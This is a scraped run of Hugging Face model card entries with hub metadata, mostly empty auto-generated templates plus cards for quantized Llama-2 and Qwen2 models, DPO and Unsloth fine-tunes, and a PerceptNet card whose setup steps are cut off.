pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
MinaMila/llama_instbase_3b_ug2_1e-6_1.0_0.5_0.75_0.05_LoRa_Adult_ep6_22
MinaMila
2025-06-11T09:56:29Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:56:17Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
aplux/Llama-2-7B-Chat
aplux
2025-06-11T09:56:24Z
0
0
null
[ "AIoT", "QNN", "LLM", "text-generation", "arxiv:2307.09288", "base_model:meta-llama/Llama-2-7b-chat-hf", "base_model:finetune:meta-llama/Llama-2-7b-chat-hf", "license:llama2", "region:us" ]
text-generation
2025-06-11T09:45:21Z
---
license: llama2
pipeline_tag: text-generation
tags:
- AIoT
- QNN
- LLM
base_model:
- meta-llama/Llama-2-7b-chat-hf
---

![](https://aiot.aidlux.com/_next/image?url=%2Fapi%2Fv1%2Ffiles%2Fmodel%2Fcover%2F20250107142618_Llama-2-Model-Details.png&w=640&q=75)

## Llama-2-7B-Chat

Llama 2 is a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters.

## Model Details

*Note: Use of this model is governed by the Meta license. In order to download the model weights and tokenizer, please visit the [website](https://ai.meta.com/resources/models-and-libraries/llama-downloads/) and accept our License before requesting access here.*

Meta developed and publicly released the Llama 2 family of large language models (LLMs), a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. Our fine-tuned LLMs, called Llama-2-Chat, are optimized for dialogue use cases. Llama-2-Chat models outperform open-source chat models on most benchmarks we tested, and in our human evaluations of helpfulness and safety they are on par with some popular closed-source models such as ChatGPT and PaLM.

**Model Developers** Meta

**Variations** Llama 2 comes in a range of parameter sizes (7B, 13B, and 70B), as well as pretrained and fine-tuned variations.

**Input** Models input text only.

**Output** Models generate text only.

**Model Architecture** Llama 2 is an auto-regressive language model that uses an optimized transformer architecture. The tuned versions use supervised fine-tuning (SFT) and reinforcement learning with human feedback (RLHF) to align to human preferences for helpfulness and safety.

||Training Data|Params|Content Length|GQA|Tokens|LR|
|---|---|---|---|---|---|---|
|Llama 2|*A new mix of publicly available online data*|7B|4k|&#10007;|2.0T|3.0 x 10<sup>-4</sup>|
|Llama 2|*A new mix of publicly available online data*|13B|4k|&#10007;|2.0T|3.0 x 10<sup>-4</sup>|
|Llama 2|*A new mix of publicly available online data*|70B|4k|&#10004;|2.0T|1.5 x 10<sup>-4</sup>|

*Llama 2 family of models.* Token counts refer to pretraining data only. All models are trained with a global batch size of 4M tokens. The largest model (70B) uses Grouped-Query Attention (GQA) for improved inference scalability.

**Model Dates** Llama 2 was trained between January 2023 and July 2023.

**Status** This is a static model trained on an offline dataset. Future versions of the tuned models will be released as we improve model safety with community feedback.

**License** A custom commercial license is available at: [https://ai.meta.com/resources/models-and-libraries/llama-downloads/](https://ai.meta.com/resources/models-and-libraries/llama-downloads/)

**Research Paper** ["Llama-2: Open Foundation and Fine-tuned Chat Models"](https://arxiv.org/abs/2307.09288)

## Source Model Evaluation

> Note: This table shows the evaluation of the source model, not the quantized model.
For the source model evaluation, refer to the [Llama-2-7B-Chat Evaluation Result](https://huggingface.co/meta-llama/Llama-2-7b-chat#evaluation-results).

|Model|Size|Code|Commonsense Reasoning|World Knowledge|Reading Comprehension|Math|MMLU|BBH|AGI Eval|
|---|---|---|---|---|---|---|---|---|---|
|Llama 1|7B|14.1|60.8|46.2|58.5|6.95|35.1|30.3|23.9|
|Llama 1|13B|18.9|66.1|52.6|62.3|10.9|46.9|37.0|33.9|
|Llama 1|33B|26.0|70.0|58.4|67.6|21.4|57.8|39.8|41.7|
|Llama 1|65B|30.7|70.7|60.5|68.6|30.8|63.4|43.5|47.6|
|Llama 2|7B|16.8|63.9|48.9|61.3|14.6|45.3|32.6|29.3|
|Llama 2|13B|24.5|66.9|55.4|65.8|28.7|54.8|39.4|39.1|
|Llama 2|70B|**37.5**|**71.9**|**63.6**|**69.4**|**35.2**|**68.9**|**51.2**|**54.2**|

**Overall performance on grouped academic benchmarks.** *Code:* We report the average pass@1 scores of our models on HumanEval and MBPP. *Commonsense Reasoning:* We report the average of PIQA, SIQA, HellaSwag, WinoGrande, ARC easy and challenge, OpenBookQA, and CommonsenseQA. We report 7-shot results for CommonSenseQA and 0-shot results for all other benchmarks. *World Knowledge:* We evaluate the 5-shot performance on NaturalQuestions and TriviaQA and report the average. *Reading Comprehension:* For reading comprehension, we report the 0-shot average on SQuAD, QuAC, and BoolQ. *Math:* We report the average of the GSM8K (8-shot) and MATH (4-shot) benchmarks at top 1.

|||TruthfulQA|Toxigen|
|---|---|---|---|
|Llama 1|7B|27.42|23.00|
|Llama 1|13B|41.74|23.08|
|Llama 1|33B|44.19|22.57|
|Llama 1|65B|48.71|21.77|
|Llama 2|7B|33.29|**21.25**|
|Llama 2|13B|41.86|26.10|
|Llama 2|70B|**50.18**|24.60|

**Evaluation of pretrained LLMs on automatic safety benchmarks.** For TruthfulQA, we present the percentage of generations that are both truthful and informative (higher is better). For ToxiGen, we present the percentage of toxic generations (smaller is better).

|||TruthfulQA|Toxigen|
|---|---|---|---|
|Llama-2-Chat|7B|57.04|**0.00**|
|Llama-2-Chat|13B|62.18|**0.00**|
|Llama-2-Chat|70B|**64.14**|0.01|

## Performance Reference

Please search for the model by name in [Model Farm](https://aiot.aidlux.com/en/models).

## Inference & Model Conversion

Please search for the model by name in [Model Farm](https://aiot.aidlux.com/en/models).

## License

- Source Model: [LLAMA2](https://github.com/meta-llama/llama/blob/main/LICENSE)
- Deployable Model: [LLAMA2](https://github.com/meta-llama/llama/blob/main/LICENSE)
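As a point of reference for the source model (not the QNN deployable model distributed through Model Farm), a minimal loading sketch with `transformers` is shown below; it assumes access to the gated `meta-llama` repository has already been granted.

```python
# Minimal sketch: running the source Llama-2-7B-Chat model with transformers.
# Assumes gated-repo access has been granted; the quantized deployable model
# is obtained through Model Farm instead.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "meta-llama/Llama-2-7b-chat-hf"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")

messages = [{"role": "user", "content": "Explain grouped-query attention in one sentence."}]
inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=64)
print(tokenizer.decode(outputs[0][inputs.shape[-1]:], skip_special_tokens=True))
```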
aplux/Qwen2-0.5B-Instruct
aplux
2025-06-11T09:56:02Z
0
0
null
[ "AIoT", "QNN", "LLM", "text-generation", "base_model:Qwen/Qwen2-0.5B", "base_model:finetune:Qwen/Qwen2-0.5B", "license:other", "region:us" ]
text-generation
2025-06-11T09:49:35Z
---
license: other
license_name: aplux-model-farm-license
license_link: https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf
base_model:
- Qwen/Qwen2-0.5B
pipeline_tag: text-generation
tags:
- AIoT
- QNN
- LLM
---

![](https://aiot.aidlux.com/_next/image?url=%2Fapi%2Fv1%2Ffiles%2Fmodel%2Fcover%2F20250108094752_Qwen2-Logo-Alibaba.jpeg&w=640&q=75)

## Qwen2-0.5B-Instruct

Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. Compared with state-of-the-art open-source language models, including the previously released Qwen1.5, Qwen2 generally surpasses most open-source models and demonstrates competitiveness against proprietary models across a series of benchmarks targeting language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc.

For more details, please refer to the Qwen [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/).

## Model Details

Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, Qwen2 has an improved tokenizer that adapts to multiple natural languages and code.

## Source Model Evaluation

> Note: This table shows the evaluation of the source model, not the quantized model.

For the source model evaluation, refer to the [Qwen2-0.5B-Instruct Evaluation Result](https://huggingface.co/Qwen/Qwen2-0.5B-Instruct#evaluation).

| Datasets | Qwen1.5-0.5B-Chat | **Qwen2-0.5B-Instruct** | Qwen1.5-1.8B-Chat | **Qwen2-1.5B-Instruct** |
| :--- | :---: | :---: | :---: | :---: |
| MMLU | 35.0 | **37.9** | 43.7 | **52.4** |
| HumanEval | 9.1 | **17.1** | 25.0 | **37.8** |
| GSM8K | 11.3 | **40.1** | 35.3 | **61.6** |
| C-Eval | 37.2 | **45.2** | 55.3 | **63.8** |
| IFEval (Prompt Strict-Acc.) | 14.6 | **20.0** | 16.8 | **29.0** |

## Performance Reference

Please search for the model by name in [Model Farm](https://aiot.aidlux.com/en/models).

## Inference & Model Conversion

Please search for the model by name in [Model Farm](https://aiot.aidlux.com/en/models).

## License

- Source Model: [APACHE-2.0](https://github.com/QwenLM/Qwen/blob/main/LICENSE)
- Deployable Model: [APLUX-MODEL-FARM-LICENSE](https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf)
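For the source model (the QNN deployable model is used through Model Farm), a minimal sketch with the `transformers` chat pipeline is shown below.

```python
# Minimal sketch: running the source Qwen2-0.5B-Instruct model with the
# transformers pipeline; this only illustrates the source model, not the
# quantized deployable model.
from transformers import pipeline

generator = pipeline("text-generation", model="Qwen/Qwen2-0.5B-Instruct", device_map="auto")
messages = [{"role": "user", "content": "Give a one-line summary of Qwen2."}]
output = generator(messages, max_new_tokens=64, return_full_text=False)[0]
print(output["generated_text"])
```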
sayantan0013/rubi_no_reason_phase_3
sayantan0013
2025-06-11T09:55:46Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:sayantan0013/rubi_no_reason_phase_2", "base_model:finetune:sayantan0013/rubi_no_reason_phase_2", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T04:27:31Z
---
base_model: sayantan0013/rubi_no_reason_phase_2
library_name: transformers
model_name: rubi_no_reason_phase_3
tags:
- generated_from_trainer
- trl
- dpo
licence: license
---

# Model Card for rubi_no_reason_phase_3

This model is a fine-tuned version of [sayantan0013/rubi_no_reason_phase_2](https://huggingface.co/sayantan0013/rubi_no_reason_phase_2).
It has been trained using [TRL](https://github.com/huggingface/trl).

## Quick start

```python
from transformers import pipeline

question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="sayantan0013/rubi_no_reason_phase_3", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```

## Training procedure

[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/sayantan0013-epfl/huggingface/runs/p0qz2em6)

This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290).

### Framework versions

- TRL: 0.18.1
- Transformers: 4.52.4
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1

## Citations

Cite DPO as:

```bibtex
@inproceedings{rafailov2023direct,
    title        = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}},
    author       = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn},
    year         = 2023,
    booktitle    = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023},
    url          = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html},
    editor       = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine},
}
```

Cite TRL as:

```bibtex
@misc{vonwerra2022trl,
    title        = {{TRL: Transformer Reinforcement Learning}},
    author       = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
    year         = 2020,
    journal      = {GitHub repository},
    publisher    = {GitHub},
    howpublished = {\url{https://github.com/huggingface/trl}}
}
```
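For orientation, an illustrative sketch (not the released training script) of how a DPO phase like this one can be launched with TRL is shown below; the preference dataset and hyperparameters are placeholders, and the actual run is logged at the W&B link above.

```python
# Illustrative DPO sketch with TRL; dataset and hyperparameters are placeholders.
from datasets import load_dataset
from transformers import AutoModelForCausalLM, AutoTokenizer
from trl import DPOConfig, DPOTrainer

model_id = "sayantan0013/rubi_no_reason_phase_2"
model = AutoModelForCausalLM.from_pretrained(model_id)
tokenizer = AutoTokenizer.from_pretrained(model_id)

# A preference dataset with "prompt", "chosen" and "rejected" columns.
train_dataset = load_dataset("trl-lib/ultrafeedback_binarized", split="train")

args = DPOConfig(output_dir="rubi_no_reason_phase_3", beta=0.1)
trainer = DPOTrainer(model=model, args=args, train_dataset=train_dataset, processing_class=tokenizer)
trainer.train()
```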
aplux/Qwen2-1.5B-Instruct
aplux
2025-06-11T09:55:40Z
0
0
null
[ "AIoT", "QNN", "LLM", "text-generation", "base_model:Qwen/Qwen2-1.5B", "base_model:finetune:Qwen/Qwen2-1.5B", "license:other", "region:us" ]
text-generation
2025-06-11T09:52:55Z
---
license: other
license_name: aplux-model-farm-license
license_link: https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf
pipeline_tag: text-generation
tags:
- AIoT
- QNN
- LLM
base_model:
- Qwen/Qwen2-1.5B
---

![](https://aiot.aidlux.com/_next/image?url=%2Fapi%2Fv1%2Ffiles%2Fmodel%2Fcover%2F20250108095432_Qwen2-Logo-Alibaba.jpeg&w=640&q=75)

## Qwen2-1.5B-Instruct

Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. Compared with state-of-the-art open-source language models, including the previously released Qwen1.5, Qwen2 generally surpasses most open-source models and demonstrates competitiveness against proprietary models across a series of benchmarks targeting language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc.

For more details, please refer to the Qwen [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/).

## Model Details

Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, Qwen2 has an improved tokenizer that adapts to multiple natural languages and code.

## Source Model Evaluation

> Note: This table shows the evaluation of the source model, not the quantized model.

For the source model evaluation, refer to the [Qwen2-1.5B-Instruct Evaluation Result](https://huggingface.co/Qwen/Qwen2-1.5B-Instruct#evaluation).

| Datasets | Qwen1.5-0.5B-Chat | **Qwen2-0.5B-Instruct** | Qwen1.5-1.8B-Chat | **Qwen2-1.5B-Instruct** |
| :--- | :---: | :---: | :---: | :---: |
| MMLU | 35.0 | **37.9** | 43.7 | **52.4** |
| HumanEval | 9.1 | **17.1** | 25.0 | **37.8** |
| GSM8K | 11.3 | **40.1** | 35.3 | **61.6** |
| C-Eval | 37.2 | **45.2** | 55.3 | **63.8** |
| IFEval (Prompt Strict-Acc.) | 14.6 | **20.0** | 16.8 | **29.0** |

## Performance Reference

Please search for the model by name in [Model Farm](https://aiot.aidlux.com/en/models).

## Inference & Model Conversion

Please search for the model by name in [Model Farm](https://aiot.aidlux.com/en/models).

## License

- Source Model: [APACHE-2.0](https://github.com/QwenLM/Qwen/blob/main/LICENSE)
- Deployable Model: [APLUX-MODEL-FARM-LICENSE](https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf)
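For the source model, a minimal sketch using the tokenizer's chat template (the standard Qwen usage pattern) is shown below; the deployable QNN model is used through Model Farm instead.

```python
# Minimal sketch: generating with the source Qwen2-1.5B-Instruct model via
# its chat template; illustrates the source model only.
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "Qwen/Qwen2-1.5B-Instruct"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto")

messages = [
    {"role": "system", "content": "You are a helpful assistant."},
    {"role": "user", "content": "What is group query attention?"},
]
text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(text, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0][inputs["input_ids"].shape[-1]:], skip_special_tokens=True))
```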
quelmap/r1-qwen3-8b-awb-4bnb
quelmap
2025-06-11T09:53:57Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "text-generation-inference", "unsloth", "conversational", "en", "base_model:unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit", "base_model:quantized:unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "4-bit", "bitsandbytes", "region:us" ]
text-generation
2025-06-11T09:49:19Z
---
base_model: unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
license: apache-2.0
language:
- en
---

# Uploaded fine-tuned model

- **Developed by:** quelmap
- **License:** apache-2.0
- **Finetuned from model:** unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit

This Qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
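A minimal loading sketch is shown below, assuming the checkpoint is used the same way as other Unsloth bitsandbytes 4-bit models; the exact inference setup for this finetune is not documented in the card, and the sequence length is a placeholder.

```python
# Minimal sketch, assuming standard Unsloth 4-bit usage for this checkpoint.
from unsloth import FastLanguageModel

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="quelmap/r1-qwen3-8b-awb-4bnb",
    max_seq_length=4096,      # placeholder; adjust to your use case
    load_in_4bit=True,        # weights are stored in bitsandbytes 4-bit format
)
FastLanguageModel.for_inference(model)  # enable faster generation kernels
```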
CDIALing/english-checkpoint-vit
CDIALing
2025-06-11T09:53:47Z
0
0
transformers
[ "transformers", "safetensors", "vits", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:53:11Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
bravery08/influencer_sup_ft
bravery08
2025-06-11T09:53:35Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T06:31:57Z
---
base_model: unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---

# Uploaded model

- **Developed by:** bravery08
- **License:** apache-2.0
- **Finetuned from model:** unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit

This Llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Satram/Llama_Instruct_Manuales2
Satram
2025-06-11T09:53:32Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T08:11:41Z
---
base_model: unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---

# Uploaded model

- **Developed by:** Satram
- **License:** apache-2.0
- **Finetuned from model:** unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit

This Llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Pressure7259/Bonnie
Pressure7259
2025-06-11T09:51:52Z
0
0
null
[ "region:us" ]
null
2025-06-11T09:48:56Z
Jorgvt/ppnet-baseline
Jorgvt
2025-06-11T09:51:35Z
4
0
null
[ "jax", "safetensors", "license:apache-2.0", "region:us" ]
null
2024-12-09T14:31:53Z
---
license: apache-2.0
tags:
- jax
- safetensors
---

# Baseline PerceptNet

## Model Description

## How to use it

### Install the model's package from source:

```bash
git clone https://github.com/Jorgvt/paramperceptnet.git
cd paramperceptnet
pip install -e .
```

### 1. Import the necessary libraries:

```python
import json

import flax
import orbax.checkpoint
from huggingface_hub import hf_hub_download
from ml_collections import ConfigDict

from paramperceptnet.models import Baseline as PerceptNet
```

### 2. Download the configuration

